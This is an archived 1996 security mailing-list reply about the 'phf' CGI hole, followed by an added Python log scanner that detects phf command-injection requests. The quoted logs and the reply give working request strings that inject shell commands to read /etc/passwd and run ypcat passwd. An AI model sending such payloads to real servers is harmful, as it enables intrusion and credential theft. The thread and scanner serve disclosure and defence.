[2949] in WWW Security List Archive
Re: 'phf' cgi-bin attack
daemon@ATHENA.MIT.EDU (Tony Beaumont)
Tue Sep 17 08:01:34 1996
From: beaumoaj@helios.aston.ac.uk (Tony Beaumont)
To: jordi@webarna.com (Jordi Matemàtic Salvat)
Date: Tue, 17 Sep 1996 11:15:51 +0100 (BST)
Cc: beaumoaj@aston.ac.uk, www-security@ns2.rutgers.edu
In-Reply-To: <323DD2B8.4EAC@webarna.com> from "Jordi Matemàtic Salvat" at Sep 16, 96 10:20:45 pm
Errors-To: owner-www-security@ns2.rutgers.edu
> Many Spanish ISPs are receiving attack attempts on their WWW servers...
>
> info26.jet.es - - [04/Sep/1996:03:17:21 +0100] "GET /cgi-bin/phf?Qalias=x%0a/bin/ls%20-la%20/ HTTP/1.0" 404 -
> infovia36_bcn.tinet.fut.es - - [04/Sep/1996:08:52:05 +0100] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 -
>
> Obviously attempting to get the passwd file.
Yes, and it works:
/cgi-bin/phf?Qalias=x%0a/bin/ypcat%20passwd
/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
return the password file and the output from ypcat.
In general, this seems to be a way of executing commands on the
server. I guess the commands are executed as 'nobody' but I'll have to
check that.
> Does anyone know what this 'phf' cgi-bin is supposed to be?
The source of phf comes with NCSA Httpd Server v1.5a (and probably with
other versions too). I'd suggest deleting it from your cgi-bin if you
have it. I have a copy of the source if anyone wants me to post it to
the list.
-Tony Beaumont
Aston University
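A log check for the pattern discussed in this thread, added here as an example (Python; not code from either poster or from NCSA httpd). It parses common-log-format lines like the ones Jordi quoted, flags every request for /cgi-bin/phf, and separates an ordinary phone-book lookup from an injection attempt by URL-decoding the query string and looking for a control character (the %0a newline that lets the query spill over into the command phf runs). It also records whether the server answered 200: the quoted lines got 404 because phf was not installed, whereas a 200 on a flagged line is the case Tony describes. The host names, timestamps and the last two sample lines are constructed; the two request strings are the ones from the post.

```python
import re
from urllib.parse import unquote

# Constructed sample access log in common log format. Host names and the
# third and fourth lines are made up; the two phf request strings are the
# ones quoted in the thread.
SAMPLE_LOG = """\
host-a.example - - [04/Sep/1996:03:17:21 +0100] "GET /cgi-bin/phf?Qalias=x%0a/bin/ls%20-la%20/ HTTP/1.0" 404 -
host-b.example - - [04/Sep/1996:08:52:05 +0100] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 -
host-c.example - - [04/Sep/1996:09:10:00 +0100] "GET /cgi-bin/phf?Qalias=smith HTTP/1.0" 200 512
host-d.example - - [04/Sep/1996:09:11:00 +0100] "GET /index.html HTTP/1.0" 200 2048
"""

# Common log format: host ident user [timestamp] "request" status size
CLF = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}|-) (?P<size>\S+)$'
)

# Any ASCII control character (including the newline behind %0a) has no
# business in a phf query; its presence is the injection marker.
CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")


def classify_request(target):
    """Return None for requests that do not touch phf, otherwise a verdict.

    'phf-lookup' is a plain query; 'phf-command-injection' means the
    decoded query carries a control character.
    """
    path, _, query = target.partition("?")
    if not path.endswith("/cgi-bin/phf"):
        return None
    decoded = unquote(query)
    if CONTROL_CHARS.search(decoded):
        return "phf-command-injection"
    return "phf-lookup"


def scan_log(text):
    """Return one record per phf request found in the log text.

    Each record carries the client host, the decoded query, the verdict and
    whether the server actually served the request (status 200).
    """
    hits = []
    for line in text.splitlines():
        m = CLF.match(line)
        if not m:
            continue  # malformed line; a real deployment would count these
        verdict = classify_request(m["target"])
        if verdict is None:
            continue
        _, _, query = m["target"].partition("?")
        hits.append({
            "host": m["host"],
            "timestamp": m["ts"],
            "query": unquote(query),
            "verdict": verdict,
            "served": m["status"] == "200",
        })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        flag = "SERVED" if hit["served"] else "refused"
        print(f'{hit["host"]:16} {hit["verdict"]:24} {flag:8} {hit["query"]!r}')
```

Run against a real access log, the records with verdict "phf-command-injection" and served set to True are the ones to investigate first; the same decode-then-check-for-control-characters step is the test a CGI wrapper should apply to every argument before it reaches a shell.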